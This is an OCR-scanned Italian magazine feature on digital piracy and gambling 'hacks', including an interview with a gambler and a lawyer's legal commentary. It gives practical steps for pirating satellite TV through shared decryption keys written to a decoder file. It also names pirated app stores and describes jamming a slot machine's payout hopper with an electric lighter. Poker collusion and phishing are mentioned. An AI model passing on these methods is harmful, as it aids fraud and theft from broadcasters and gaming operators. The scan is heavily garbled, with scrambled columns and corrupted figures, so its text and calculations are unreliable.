questione e cliccare // 

Oet Logins. li risul- r __ . 

tato sarà un elenco d i Conia dlffus , 

dati per l'accesso al on demand \ 
servizio da provare Web dei Conti 
uno per uno. Per ora Sullepiattafoi 

i pirati non si dispera- terrestre/saU 

m pii. -il tanto, i piai- hanno un mio 
il pi;, ghiotti di Skve 

Mediale! Premium bottino SU 

sono sicuramente le VOrreb .'pio n 
partite di calcio e al¬ 
tri eventi sportivi tra¬ 
smessi in diretta e anche se non riescono 
nell’inipresa di trovare un account valido, 
possono sempre ricorrere a RojaDirectn 
(www.rojadirecta.me) o a Live TV (www. 
livetv.i u/it), due servizi che offrono Io stre¬ 
aming gratuito di eventi sportivi. 


ai contenuti multimediali, ina sempre piò 
spesso riguardano anche il mercato delle 
app mobile che, con l'enorme diffusione 
di smartphone e tablet, frutta ormai ricavi 
milionari. Non tutti, però, sono disposti a 
pagarcecon buona pace delle leggi vigenti 
i pirati si procurano le app nel modi piò 
disparati. Mentre per i device Apple si deve 
ricorrere al jailhreak, per quelli Androni 
le cose sono estremamente piò semplici 
grazie a un "pratico” app store alternativo. 

Si chiama Aptoide 


Con la diffusione dei servizi 
on demand e io sbarco sui 
Web dei contenuti trasmessi 
suite piattaforme dei digitale 
terrestre/satellitare, i pirati 
hanno un nuovo e appetitoso 
bottino su cui in tanti 
vorrebbero mettere fe mani 


(www.aptoide.com) 

e una volta installato 
e avviato, la ricerca 
e l’installazione di 
app a pagamento 
è del tutto simile a 
quanto avviene nel 
Play Store ufficiale, 
solo che qui non si 
passa per la cassa. 
Nemmeno Win¬ 
dows Pilone viene 


C’è un’app per tutto 

(ili interessi dei pirati informatici, comun¬ 
que, non si fermano soltanto ai software o 


risparmiato: per l’OS 
mollile di Redmond i pirati, oltre alla ver¬ 
sione installabile nel dispositivo stesso, 
hanno realizzato anche la versione per PC 
di Bazaar (www.H8.139.16L234/bazaar/ 
Ba/aarHome.aspx), market alternativo 
pieno zeppo di app homebrew (cioè fatte 
in casa) che anche in questo caso richiede 
lo sblocco del dispositivo. Insonima, por 
tutto c’è un’app e per tutte loro c’è un modo 
per utilizzarle gratis. 


I PIRATI DELLA TV SATELLITARE 
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Nonostante le battute di arresto, il 
card sharing è una pratica ancora 
largamente diffusa. I diversi siti Web 
che trattano l’argomento sono vivi 
e vegeti e anche se I controlli ora 
sono più serrati, è ancora piuttosto 
semplice guardare i programmi Sky 
sulla TV senza pagare l’abbonamento. 
Armati di un decoder Dreambox o di 
uno compatibile con gli emulatori 
CCcam, NewCS e MGcam, e ricorrendo 


a tool per PC che consentono d'in¬ 
tervenire sui settaggi del dispositivo 
lwww.dreambox.lt/tools.htm) o a un 
comune client FTP, i pirati scaricano 
le chiavi condivise su forum e bloq 
come www.cccam-server.lnfo, www. 
aalamsat.com e www.master2star. 
blogspot.it e le inviano al decoder 
sovrascrivendo il file che gestisce la 
decrittazione dei canali (ad esempio, 
var/keys/newcamdJist). La procedura 
è talmente semplice e rapida da non 
essere un fastidio per gli scrocconi, 
anche nel caso in cui sia necessario 
ripeterla di tanto in tanto pervia del 
blocco operato da Sky. 
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“Trucco il PC e 
vinco sempre!» 

L’hacker dei giochi di azzardo ci ha guidato 
in un mondo underground dove il PC diventa 
una macchina perfetta per scommesse sicure 
e vincite facili. Svelati i retroscena 
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C itiquaniasctte mìl iardi di euro: sono i sol 
dispesi dagli italiani nei giochi d’azzardo 
nei primi otto mesi del 2012, con un in¬ 
clemente) di circa 8 miliardi rispetto all anno 
precedente. Una cifra che ha portato l'Italia 
'Ititi.primi paesi al mondo per diffusione di 
questi giochi (si parla addirittura del secondo 
posto), specie grazie alla diffusione di quelli 
on-line che, dal 2004, non conosce sosta, l a 
crescita tra il 2009 e il 2011. per dire, è siala 
di circa il 150%, e sèmpre nel 2011 la spesa 
prò capite media si è assestata sui mille euro 
mensili. Numeri da capogiro per un business 
c! i / rappresenta il 3% de) P.l.l.. italiano e che in 
y ; io! u.Ci'roano di interpretare. C’è ehi li rteol• 
lega ..ciiododi crisi, e quindi alla ricerca di 
for me d> reddito inimed iate e faci I i. C’è eh i ci 
vede u ila moderna inte.r prelazióne del 1 adagio 
"unire rutile al dilettevole", abbinando lo 
svago tipico del gioco on-line alla possibilità 
diari addisi, 1 -chi, molto più semplicemente, 
vede il solo risvolto economico. 

Dipendenza da gioco 

In effetti, seda una parte il pericolo di assue 
fazione da gioco di azzardo è reale (e noi stessi 
invitiamo a starci molto attenti), è un dato di 
fatto che coi giochi di azzardo si può vincere e 
pure molto.Che si trattidi scommesse, poker 
o altri giochi: che si tratti delle versioni on-line 
o quelle legate alle famigerate "macchinette 
mangiasoldi’’, la vii toriadei giocatone, innan¬ 
zitutto, una questione statistica, e poi anche 
legale. Eh sì perché, per legge, le slot -mach ine 
o new slot (il termine videopoker è andato 
in disuso), devono erogare il 75% di quanto 
incassano. Insouima, statisticamente, ogni 
10 euro giocali se ne vincono almeno 7,5. Pur 
troppo, come ben sappiamo, la scienza delta 
probabilità gioca brutti scherzi, così capita 
che c’è chi non vince nulla e chi vince molto. 















56,9 miliardi di euro 

spesi dagli italiani nei primi 8 mesi del 2012 

8 miliardi di euro 

rincremento delle giocate rispetto al 2011 

1.000 euro 

mensili la spesa pro-capite nel 2011 

4 milioni 

gli italiani che hanno giocato almeno 
una volta al poker on-line 


GIOCO D'AZZARDO E SCOMMESSI 


Aw. Guido Scorza 

Esperto >n Diritto 
dette Muove fonologie 


Chi non ha mai sogna¬ 
to di sedersi ad un ta¬ 
volo verde o davanti 
ad una slot-machine e di sbancare il 
gestore del sito, del bar o del casinò 
batta un colpo. Vincere giocando d'az¬ 
zardo è una ambizione ultrasecolare ed 
un'irresistibile tentazione alla quale in 
pochi sanno davvero resistere. Dispor¬ 
re del trucco o del sistema vincente 
è, pertanto, il sogno proibito di ogni 
giocatore e biscazziere incallito che 
sieda in una rumorosa sala da gioco 
o, piuttosto, davanti al suo PC. 

Alcuni giochi d 'azzardo, anche on-line, 
quali, ad esempio, il poker o il black 
jack vengono definiti giochi di abilità 
volendo con ciò indicare che l'alea o, se 
preferiamo, la fortuna che decretano, 
normalmente, il successo o l'insuc¬ 
cesso di un giocatore sono mitigate 
dall'abilità, esperienza ed intelligenza 
di quest'ultimo. È da qui che occorre 
muovere per provare a rispondere alla 
più ricorrente delle domande. 


W.M. Usare trucchi e sistemi per 
sbancare al tavolo verde è legale? 
L'abbiamo chiesto al nostro avvocato. 
G. S. La risposta dietro alla quale ogni 
buon avvocato si trincera è: “dipen¬ 
deI". Nessun dubbio che se il trucco 
o il sistema servono ad amplificare 
ed aumentare l'abilità del giocatore 
nessuna contestazione può essergli 
indirizzata e tutto deve considerarsi 
regolare. 

Se, invece, il trucco consiste nel "pren¬ 
dere in giro" il banco o gli avversari, il 
discorso diventa diverso e il rischio di 
sedersi al tavolo da giocatore ed alzarsi 
da "fuorilegge", diventa elevato. 

Lo stesso principio guida la valutazione 
di liceità o illiceità di chi, davan ti ai ta¬ 
voli verdi on-line, entra accompagnato 
da “trips&triks" informatici. 

Tutto va bene se ci si serve di qualche bit 
di codice per tenere a mente le mosse 
dell'avversario o per provare ad anti¬ 
ciparle mediante rapidi e "disumani" 
calcoli statistici. Se invece lasciamo 
che il nostro software interagisca con 
la piattaforma di gioco provando ad 
alterarne il funzionamento o ad ac¬ 


cedere forzatamente gd o/cu 
aree riservate, ctmi0ìanoj 
trasformiamo infatti da è. 
del secolo dell'informatica ini 
ri, rischiando di porre silenziosameft 
te in essere una lunga serie di reati, 
dall'accesso abusivo all’altrui sistema 
informatico alla frode informatica, dei 
quali, qualcuno, prima o poi potrebbe 
chiamarci a rispondere. 

W.M. E allora, cosa è lecito e cosa è 
illecito tra i più ricorrenti trucchi e 
stratagemmi utilizzati dai biscazzieri 
della Rete? 

G.S Trucchi e sistemi basati su regole 
statistiche e matematiche tipo quelle 
utilizzate nella gestione delle scom¬ 
messe multiple sono, normalmente, 
da considerarsi perfettamen te legali. 
Sta a chi organizza questo genere di 
giochi identificare adeguate soluzioni 
per evitare di essere “spennato” ma il 
giocatore non ha ragione per astener¬ 
si dal cercare di aiutare confa "testa” 
la dea bendata a renderlo ricco. 
Analoghe considerazioni valgono 
per la liceità dell’utilizzo di software 


SALE e illegale 

e app che promettono, a prescindere 
dal fatto che ci riescano o meno, di 
aiutarci a “giocare" partite vincenti 
on-line o a stravincere scommesse 
aumentando, a dismisura, la nostra 
capacità di calcolo statistico e, quindi, 
di prevedere gli esiti di una puntata. 
Nessun dubbio, invece, che sia certa 
mente illecito utilizzare app capaci di 
mandare in tilt le famigerate "macchi¬ 
nette mangia soldi* Queste amate/ 
odiate macchinette, infatti, sono da 
un punto di vista giuridico dei sistemi 
informatici con la conseguenza che 
l'alterazione dolosa del loro norma¬ 
le funzionamento costituisce reato: 
danneggiamento di un sistema in¬ 
formatico o, a seconda le modalità 
seguite per ottenere il risultato, acces¬ 
so abusivo ad un sistema informatico 
o frode informatica sono le figure di 
reato per le quali, più probabilmen¬ 
te, un giudice, prima o poi, potrebbe 
condannarci qualora provassimo a 
mandare in tilt, usando un'app per lo 
smartphone, una macchinetta man- 
giasoldi. Tutto sommato, quindi, è 
meglio evitare! 


Però sappiamo tutti che l'alcatorietà può 
essere influenzata a vantaggio di un gioca¬ 
tore”, racconta Matteo, giocatore incallito, 
professionista del gioco d'azzardo che siamo 
riusciti a contattare per la nostra inchiesta. 
Alla richiesta di spiegazione, fin orvistato 
aggiunge: ci sono tecniche, a vcltirk": a 
volte al limite della legalità, che conser io 
no di far vincere anche con la probabilità: 


contro". Lanciato il sasso, non è più 
possibile tornare indietro, tanto che 
chiediamo a Matteo di parlarceli queste 
tecniche, confidando sull'anonimato. "Ve 

ne parlo solo a livello teorico, perché met¬ 
tere in pratica queste procedure è rischio 
so e, in qualche caso, si rischia grosso con 
la legge". Avvertenza recepita, ma adesso il 
v ,ig;;Jocomincia! 
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Scommesse on-line | 



PER SAPERNE 
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IL RISCHIO 
DELLE ROULETTE 

"Al tavolo della roulette 
è prassi comune quella 
di effettuare giocate 
successive sulle uscite 
del rossoodel nero fino 
al verificarsi dell'evento 
desiderato, utilizzando 
la tecnica del raddoppio 
della puntata" d racconta 
il nostro amico Matteo. 
'Si tratta invero di una 
pratica assai rischiosa che 
può portare addirittura 
alla perdita dell'intero 
capitale dal momento 
die, statisticamente par¬ 
lando, l'usata del rosso 
o del nero teoricamente 
potrebbe verificarsi 
dopo un numero infinito 
di tentativi". Assoluta- 
mente da evitare se non 
riusciamo a controllare 
il nostro istinto ad az¬ 
zardare sempre di piu le 
puntate. 


1 


Scommesse multiple 
a rischio quasi zero 

Il primo trucco, spiega il nostro uomo, 
è quello delle cosiddette scommesse 
multiple. Si tratta, in buona sostanza, 
di sfruttare il calcolo delle probabilità 
in modo furbo, ma senza contrae veni 
re alla legge. Una scommessa multipla 
è data da piti pronost ici legati ( ra loro. 
Il vantaggio è che, se si azzeccano 
tutti i pronost ici, si ottiene un'eleva¬ 
ta vittoria, con una spesa minima. 
Del resto, basta sbagliare un solo ri¬ 
sultato... c casca il palco, lìsempio 
pratico: mettiamo che nell'inconiro 
di calcio luventus-Siena la vittoria 
della squadra torinese sia data a 5, 
mentre nella partita Napoli-Pescara. 
la vittoria della squadra di casa sia 
data a3. Con una puntata di 10 euro, 
indovinando entrambi i propostici 
ci si portano a casa IO x 5 x5 -150 
euro (inetto i0 «pesi per la puntata, 
ovviamente L : s ommessa multi¬ 
pla è molto utilizzata. c iun” racconta 
Matteo.L’importanteèt ,en >nte 
alcune, ferree, regole. 

• la prima e di non puntare mai 
sii un evento o squadra legata 
sentimentalmente” adiipun 
la. Scevero die nellescoinines 
se serve obiettività, questo è ve 
ro a maggior ragione in quelle 
multiple. (In solo sbaglio, infat 
ti, può risultare fatale. 



• l a seconda regola è che non si grò guadagno. Ora mettiamo che ci 
deve esagerare, limitando il sia una partita simile, con le stesse 
mimcrodievenliconculeiiati. probabilità in gioco. Puntando su 

entrambe, la matematici insegna 
Sebbene esistano casi documentati di che si ha l'Bl'V. di probabilità che si 
ricche vincite con scommesseda lOc verifichino contemporaneamente 
passa pronostici, è muglio limitarsi a le due vittorie. Inserendo un tèrzo 
hi ubassimo di 5.F. il mot ivo lo spiega promisi ico, con la stessa probabilità 
heiiwli Iiauiinatica. Mettiamo, per di vittoria, la percentuale successo 
esempio nc debba scommettere scende al 73%. Con cinque pronostici, 
suUapa. it luvt, tu« Siena, con al 59%. K stiamo parlando di puntate 
la squadra tori: tesi, c e ha il 90% di dove la probabilità di vittoria è del 
possibilità di viticci Significa che . 90% per ogni èvemo, quindi un caso 
ha 9 possibilità su iodi vin *r Putì più unico che raro. Secondo Matteo, 
tare sulla Juventus, quindi, tu a* o titillili,meglio limitare le scommesse 
di effettiva vittoria, porta a un ma n»* ..pie a eventi piuttosto "facili” e 


I PIRATI SBANCANO I TAVOLI DA GIOCO COL BOT 



È di qualche settimana fa la notizia 
secondo cui, in Svezia, è stata sgo¬ 
minata un'operazione riguardante 
l'utilizzo di "bot" nelle partite di poker 
Online che ha fruttato vincite illegali 
per diverse decine di migliaia ^ 

di euro: altro che i diecimila 
vinti dal nostro Matteo! 

Ma cosa sono questi bot? 

Si tratta di speciali sof- 6) 

tware in grado di giocare . 

al posto di un umano, con s'«\ - 1 L - 

le conseguenze del caso. 

Quali? Rispetto a un giocatore 
reale, un bot ha il vantaggio di es¬ 
sere estremamente obiettivo, di avere 
una memoria infallibile per tenere 
conto delle carte uscite e, soprattutto, 
di saper calcolare le statistiche della 
partita in un battito di ciglia. Ci sono 


due livelli tecnologici che rendono 
interessante un bot di questo tipo. 
Il primo, è la sua capacità di inserirsi 
in una partita, mentre il secondo è il 
suo cervello, cioè gli aspetti ma¬ 
tematici che ne regolano 
le strategie. Per quanto 
jj fj.'v vi\ riguardo il primo, di 
solito i bot sfrutta¬ 
no dei programmi 
secondari, capaci di 
“agganciarli" al sof¬ 
tware di ogni specifica 
poker room, prendendo il 
posto del giocatore reale (che 
di solito ha comunque la capacità di 
modificare le scelte dell'agente virtua¬ 
le). In buona sostanza, quindi, sono in 
grado di “vedere" le carte sul tavolo e 
tenere traccia di quelle giocate dagli 


avversari. Il secondo aspetto è il più 
interessante, perché coinvolge un'in¬ 
telligenza artificiale raffinata. A dire il 
vero, ce ne sono diverse, nel campo 
del poker, e ciascuna si diver¬ 
sifica per strategie e ap 
procci più o meno 
aggressivi alla par¬ 
tita. Una delle più 
famose è Polaris, svi 
luppata dall'università 
dell'Alberta. è impor¬ 
tante notare che, mentre 
l’intelligenza artificiale, di 
per sé, non è illegale, e anzi 
è frutto di studi di alto profi¬ 
lo, è fuori legge il suo utilizzo 
all'interno di un bot spacciato 
per giocatore umano 




















GRATTA&VINCI... 
CHE FORTUNA! 

Matteo ci svela un truc¬ 
co, da lui utilizzato fino 
a qualche tempo fa, 
che qli ha permesso di 
vincere al Oratta&Vinci. 
In poche parole, gli 
bastava acquistare 
un'intera serie di bi¬ 
glietti che alllntemo 
conteneva una quota 
minima di vincita 
garantita. Ci confida 
di aver abbandonato 
questa tipologia di 
scommesse poiché con 
le nuove regole di gioco 
nessuno può sapere se 
un blocchetto contiene 
biglietti vincenti per un 
totale superiore o infe¬ 
riore alla spesa soste¬ 
nuta per acquistarlo. 


in un numero limitato, non superio¬ 
re a cinque. 1 gestori dei siti di gioco 
sanno perfettamente che. superata 
questa soglia, il rischio è fin troppo 
elevato, quindi Stimolano gii utenti 
aosare con dei bonus speciali, dedi¬ 
cati proprio alle 'multiple" superiori 
•ai 4-5 propostici. Si tratta, racconta 
l'esperto, di specchietti per allodole, 
da evitare accuratamente. Per scopri - 
re come effettuare scommesse mul¬ 
tiple, leggiamo il tutoria! di pagina 
47 dove viene utilizzato il software 
commerciale Totofortuna Scorarne* - 
se, in regalo solo per i nostri lettori. 

Surebet: per chi ama 
vincere facile! 

A questo punto viene nato rale di iede - 
re se esiste una tecnica che permette 
di vincere unsaeco di denaro, giusto 
per vedere quali trucchi sì escogitano 
questi giocatori, Il nostro interi r 
tot e comincia a.parktrckìisurohet, 

“Scommesse sicure" che portano ad 
una vittoria altrettanto sicura, otte¬ 
nuta sfruttando la diversi ràdi quote 
che i vari bookmakers offrono per 
uno stesso evento sportivo. Matteo 
ci svela che esiste uria Im mola ma- (l/2,8Ml.3,*Ml '3»3)’0.95 12 
temàtica per scoprire se una scom¬ 
messa'è sicura o métto: in particolare 
si parla di surebet quando la somma 
delle inverse delle due (o più) quote 
è minore dii. Per farci comprendere 
meglio il meccanismo, fa un esempio 
concreto. Supponiamo di giocarci 
la vittoria della Juventus che 
viene data a 1,80 su un con¬ 
cessionario per il gioco on- 
_>. line e la sconfitta a 2.45 su di 

un altro. Per capire se si tratta 
diana scommessa sicura ap¬ 
plichiamo la formula: 


fettuare scommesse dove, qualunque 
sia l’esito di un incontro (vittoria, pa 
règgio riscontri ta), avremo comunque 
un guadagno. I.a condizione ideale 
per una scommessa sicura si verifica, 
dunque, quando! diversfbookmakers 
hanno quote sufticieuiemente alte 
su ciascun lato di un evento tale da 
coprire eventuali perdite. Torniamo 
allapartita luvemus-Siena e prenrìia 
mo come esempin le quote offerte per 
ogni singolo evento da alcuni book- 
makers riportate in tabella: 


Grazio a Matteo, scopriamo quindi 
che il trucco per giocare scommes¬ 
se sicure consiste nel trovare quegli 
eventi checonibinati tra loro danno 
un vantaggio matematico e varia¬ 
re opportunamente le puntate. Per 
praticare questo tipo di scommes¬ 
se occorre tenere molti conti aperti 
con diversi bookmakers e conoscerne 
bene le regole, Per spostare denaro 
in tempo reale tra un contri presso 
un bookmakers ed un altro, si può 
usare la carta di credito o effettua¬ 


re versamenti tramite altri sistemi 
*■ iv Mando le differenze dì quote pos- come la monelaelettronica owallet. 
.a 1 o enere una vincita maieinatì - Requisito indispensabile è avere un 
cacert; C< m verifica,applichiamo indirizzoe-mail valido, dopodiché, 
la formula rista ^ ; r a prendendo i una volta aver depositato i fondi (con 

valori più alti pe, ogni r j: assegno, bonifico o carta di cre¬ 

dito), i trasferimenti (depositi 
e prelievi) di moneta elettro¬ 
ni! a ^''verranno io tempo 
Poiché la somma è inferiore ad 1, cal . I Principali fornitori 
possiamo procedere con la nostra di iricittpagar iati con 
scommessa. Stabilito il capitale da in- moneta elétt r i ni'risono 
vestire,ad esempio lOOeuro, occorre Moncvbooke.. V tv.v. •• 
variare opportunamente la puntata su magazine.it/link ,. *11), v 

ogni singolo evento in questo modo: NeteUer(\vww.tvinmaga- % 

zinc.il/link/2032), Pay pai 

• Sul segno 1 di Bwin puntiamo (wxvw.w inmagazine.it/ 
l'importo di £ 37.43 cosi calcolato: link/2035). 

(lt>® 2,8) 0.9342 37,43 Chiaramente non si 

verificherà mai che un 

• Su) pareggio di VVìllianf Biilpuntia- bookmakers offra da 

mo!'importodi£31.75cosicakolato: solo una scommes- 

(108 3,3) 0,9542-31,75 sa di questo genere, ^ 

11,80 1 2.1.» 0,9637 

• Sul segno 2 di Lottomatica pun- 

potché il risultato è minore di tianio l'importo di £ 30,82 così eal- 'SRsjy 

1, possiamo parlare di surebet colato: ;,; : : 

che dà un KOI (ritorno sull’in- (100 3,4) 0.9342 30,82 

■'■•{paria: 1-0,9367= 

3,6% Possiamo quindi dedurre Così facendo, qualunque sfa l’esito 
che le surebet sono partivo- delia partita avremmo ottenuto una 
lari scommesse matemati- vincita netta di £4,79: - JÉBT" 

sl riamente assicurate indi- 

& pendentemente dail’esi- • Esito finale l fVincita netta): Jj 

Hk todi un evento. Infatti. 37,43*(2,8 1) 31,73 30,821,8 

sfruttando le differenti • Esito finale X(Vlneita netta): , ffr (f 

& quote offerte tra i 31.75‘(3,3 1) 37,43 30.82 €4,773 j k ^ 

bookmakers on- • Esito finale2 (Vincita netta): 
line, è possibile ef- .30,82 (3,4 1) 37,43 31,73 = € 4,79 


Evemo 

Betdic 

Bwin 

Lottomatica 

William Hill 

1 

2,6 

2.8 

2,7 

2,5 

X 

3,1 

3 

2.9 

3.3 

2 

3,3 

3,2 

3,4 

3.2 












ALL IN 

In un gioco senza limiti 
significa puntare tutte le 
chips die si hanno. 

BLUFF 

Puntare con cane 
' pessime'' per intimidire 
l'avversario. 

CALL 

Serve per vedere la punta¬ 
ta quando non si vuole più 
rilanciare. 

CHECK 

Se nessun giocatore ha 
puntato, é possibile passa¬ 
re il gioco. 

DEALER 

È il mazziere: colui die 
distribuisce le cane. 

FLOP 

Nel Texas Hold'Em e Oma¬ 
ha sono le prime tre cane 
scoperte contemporane 
amente. 

GRINDER 

Chi gioca per ore al fine di 
accumulare capitali. 

OUTS 

Il numero di possibilità 
che un giocatore ha di vin¬ 
cere il piatto, in base alla 
situazione del momento. 

POT 

I È il piattofossia isoidi pre¬ 
senti al centro del tavolo). 

ROCK 

Giocatore cauto e pruden¬ 
te che punta solo con carte 
alte in mano. 


poiché significherebbe per lui una ha partner eccellerlii, come i più diff usi 
perdita matematica. Le scommesse servizi di gioco nn line. Al moine»- 
sicure vanno qui ni ricercate quando lo, Poker Office ha una base di oltre 
c’è una differenza notevole tra le quo lOOmila utenti e oltre lOOmila poker 

te presentate dai differenti conces- room (stanze di gioco). K il prezzo, In 
sionari. Inoltre, bisogna tener conto caso di acquisto, non è alto: circa 100 
nel calcolo complessivo anche dei euro, il nostro interlocutore continua 
costi per i prelievi, per i depositi e a svelare nuovi, appassionanti dettagli, 
quelli eventualmente trattenuti sul parlando poi di un secondo software, 
le vincite. Per semplificare i calcoli "fc un programma storico del setto- 
necessari per effettuare qua sureber, re, usato dai patiti del genere", 

abbiamo preparato un foglio Excel Si tratta di PokerTracker -4 

già configurato con tutte le formule (w w w.pokerl racket. _ 

necessarie che possiamo scaricare coni), rilasciato nel 
dal Win CD-Rom. 2001 ma che vanta già 

quattroversioni.Unpo' ^ 

Poker: il computer più schizzinoso sui servizi 

ti da una mano supportati, offre statistiche piu Jjjp/ 

Il nostro prodigo esperto, sguardo approfondite al prezzo di un'inter- 
accigliato, passa a elargire qualc he faccia più macchinosa. Disponibile in 
chicca più, corno dire,smaliziata. Par- versione dimostrativa gratuita, nella 

la, infatti, dei software per i giochi versione finale costa circa 80 euro, 
d'azzardoon line. "Cenevonudi tutti 

i tipi, ma i più diffusi, ed efficaci, Giocate da hacker 

sono quelli pr r il poker". Il poker, /CvsX L'esperto spiega che chi non 
probabilmente, è il u d » ochi di |l00%| teme ripercussioni legali è 
azzardo, quello dove il cal ojo d'Ile solito organizzare delle truf- 

probabilitàlnfa da padrone. E pi .iprio fc in grande stile. La più diffusa è queL 
per questo, spiega Matteo, che motti Uffnfà .o'*usione - '. Inhuonasostan- 
giocatori professionisti sh uttanosol za do o ! iù amici si datino appunta 
tvvare che tengono conto delle carte mento i : > ur liuto tpvoiovjnuaie, te- 
uscìte. rìcalcolando di volta in volta nendosi pi. i contato ia Skype. 
le probabilità aggiornate. Uno del Cosi facendo, pei os< np /.inuntavo- 
più gettonati è Poker Office (www. lo da 4 giocatori, se ìdik i i.un /scoti* 
(MjkemlTice.com), programmadispo- possono dirsi che carte hanno e. ,i 
n ibi le aocheln versione dimostrativa fatto, giocare insieme. Cosi le prona 
gratuita, che serve proprio a tenere bilità di vittoria raddoppiano, e poi ci 
traccia delle carte giocale, aggior- si spartisce il bottino. Esiste anche la 
nandodi conseguenza le statistiche, "collusione solitaria": ci sono giocato 
In buona sostanza, spiega Matteo, ri clic con due o più connessioni Inter- 
Poker Office è capace di intercettare net a disposi/ione(quindi con ìndiriz- 
le giocate avversarie, calcolare prò- zi IP e nomi mente diversi), si collega- 
babilirà e, con un’interfaccia molto no con più sessioni contemporanee a 
chiara, aiutare a decidere il da farsi, uno stesso tavolo. I In po’ come gioca- 


r/ir/irTi 


probabilità di vittoria. Bsi, anche que¬ 
sta tecnica i* illegale, Inline, i giocato¬ 
ri piti criminosi sfruttano vere*proprie 
tecniche di hacking. La più diffusa è il 
phishing. con la quale riproducono 
una copia del sito di poker preferito di 
un giocatore e rubano le sue creden¬ 
ziali di accesso. Una volta ottenute 
queste, giocano al posto suo. .. per per¬ 
dere allo stesso tavolo dove stanno 
giocando in via ufficiale! 

Slot machine: si bara 
anche con lo smartphone 

Trucchi e trucchetti non si 
rivolgono solo al gioco on- 
line, comunque. Sebbene non 
ne sia appassionato. Matteo racconta 
che anche le nevvslot rappresentano 
una buona sfida per gli smanettoni. 
Giusto qualche tempo fa stè saputo di 
un gruppo di persone che è riuscito a 
modificare le "macchinette" per far 


In questo caso, si rimane nel dominio re piti partite contemporaneamente, loro erogare denaro a palatevi carabi- 


delia legalità, anche perché il servizio come fanno molti, ma con molte più nierichesisonooccupati della vicenda 


COSA SIGNIFICANO I SEGNI 1,X,2 NEI PRONOSTICIA PREMI 


ESITO FINALE/1X2 

Si tratta del tipo di scommesse più ovvio, 
in quanto si deve pronosticare l'esito dei¬ 
la partita attraverso i tre segni 1 (Vittoria 
squadra in casa), X (pareggio) e 2 (Vittoria 
della squadra che gioca in trasferta). 

DOPPIA CHANCE/1 X X2-12 

È una scommessa derivante da quella 
precedente ma il pronostico è vincente 
se uno dei due segni dell'esito scelto è 
corretto. 


ESITO FINALE 1X2 CON HANDICAP 

Si tratta di una scommessa analoga 
all'esito finale 1X2 con la differenza che, 
alla squadra favorita, è assegnato un han¬ 
dicap in termini di goal da considerare 
nella determinazione dell'esito vincente. 

RISULTATO ESATTO 

É una scommessa che richiede di prono¬ 
sticare l'esatto risultato della partita, ossia 
il numero dei goal segnati da ciascuna 
delle due squadre. 


UNDER/OVER 

È una scommessa che consiste nel pro¬ 
nosticare se i goal complessivamente se¬ 
gnati in una partita. Fino a 2 reti segnate 
si ha l'under, da 3 reti in su si ha l'Over 

GOAL/NO GOAL 

È una scommessa sull'esito finale di una 
partita in termini di reti. Se entrambe le 
squadre seqnano almeno un qoal, l'esito 
èGoal, se almeno una squadra non segna 
nessuna rete l'esito è No Goal 



PARZIALE 1 TEMPO/FIN ALE 

Si tratta di una scommessa che richiede 
di pronosticare l'esito 1X2 del solo primo 
tempo e l’esito 1X2 finale. 

SCOMMESSA "PARI&DISPARI" 

Scommessa che prevede di pronosticare 
se la somma dei goal segnati durante 
una partita sarà pari o dispari. 




Scommesse on-line 


PC e Smartphone degli Hacker 


Scommesse legali e sicure 


Grazie al software Totofortuna Scommesse potremmo puntare sugli eventi calcistici 

i le quote dei principali bookmakers. 


dei campionati di tutto il mondo sfruttando 
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Installa e aggiorna gli archivi 

Avviamo l'installazione esegmndo il file Installa-TFScom- 
messe.exe. al termine dellaf<j|ffura guidata sarà possi¬ 
bile eseguire il software. All'avvio il 
re gli archivi: questa funzionalità ci 
campionati, classifiche, scommesse e quote. 


Aw*Mm*nti <3t i , »oov»n»r* rv#t oro*ott>eo inui*t« 4 su 4 
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Il nostro primo sistema 

2 | Dalla schermata Palinsesto scommesse pronostichiamo, 
- J 4 partite: due con X2 una con 1X e una con il segno 1. 
Vogliamo avere la garanzia di guadagnare anche indovinando solo 
3 di questi risultati Dalla schermata Metodi di riduzione selezio¬ 
niamo Riduzione a guadagno garantito e facciamo clic su Avvia 



Ai Selezioniamo il sistema vincente 

0 \ La riduzione ci proporrà i migliori sistemi possibili in retazio- 
- ne al numero di pronostici che è possibile indovinare. Nel 
nostro caso poiché pensiamo di indovinarne almeno 3 su 4 sele¬ 
zioniamo il secondo. Il sistema garantisce un guadagno positivo al 
100% qualunque siano i 3 risultati indovinati. 


-a Calcoliamo la vinc ita 

ij i Prima di giocare le scommesse è utile calcolare quanto 
possiamo vincere in relazione ai pronostici che indovinere¬ 
mo. Facciamo clic sul pulsante Calcola redditività. Giocando 8 € e 
indovinando 3 pronostici su 4 si vincerebbero da 9 a 12 €, indovi¬ 
nando tutti i 4 pronostici si vincerebbero più di 22 €. 


[ii; 

OCCHIO 
AL PAYOUT... 

Il payout di una scom¬ 
messa è la percentuale 
tra l'ammontare che 
viene restituito ai 
giocatori sotto forma 
di vincite e l’ammon¬ 
tare incassato. Più il 
payout è alto più è alto 
l'importo ridistribuito 
ai giocatori. Tramite To¬ 
tofortuna Scommesse è 
possibile ordinare tutte 
le scommesse presenti 
nel palinsesto in base 
al payout teorico e sele¬ 
zionare cosi quelle più 
convenienti. 

ALZIAMO LE QUOTE 

Uno scommettitore 
dovrebbe sempre 
confrontare le quote di 
più concessionari, {'im¬ 
portante per le proprie 
scommesse selezionare 
I concessionari che 
offrono le quote più 
alte. Sulle scommesse 
multiple, per via della 
moltiplicazione delle 
quote, è ancora più 
importante. Tramite 
Totofortuna Scommesse 
(opzione Gestione quo¬ 
te) è possibile delegare 
al software la ricerca 
dei concessionari che 
offrono le quote miglio 
ri e aumentare cosi la 
redditività delle proprie 
scommesse. 


raccontano che i I modus operandi non 
è ancora chiaro, ma quel che è certo è 
clic queste persone usavano uno smar¬ 
tphone di fabbrica/jone cinese, con un 
software in lingua originale, capace 
evidentemente di interferire con le new 
slot isolandole dalla rete di controllo e 
riuscendo a comandare a distanza i 
ruliidelle slot perfarli bloccare sul sim¬ 
bolo designato. 

Contrariamente a quanto si crede, 
non esistono app magiche per vincere 
facile, e sono proprio curioso di sapere 
cosa salterà fuori dall'analisi di quegli 


smartphone: vedrete che, in realtà, si 
trattadiqualcheallrodispositivo ma¬ 
scherato da telefono ", spiega Matteo. 
Il nostro esperto, comunque, racconta 
che un suo amico, che lavora come in 
statlatoredi queste macchine, sostiene 
che per gabbarei modelli meno recenti 
basta un accendigas elettrico. Nei mo¬ 
mento in etri si vince, spiega Matteo, 
si apre un cassetto interno, l'hopper, 
che eroga la vincita. Mentre è aperto, 
basta attivare un accendigas elettrico 
per tenere bloccato il cassetto e fargli 
erogare denaro come se piovesse. 


Gioca responsabilmente 

La chiacchierata con Matteo si conclu¬ 
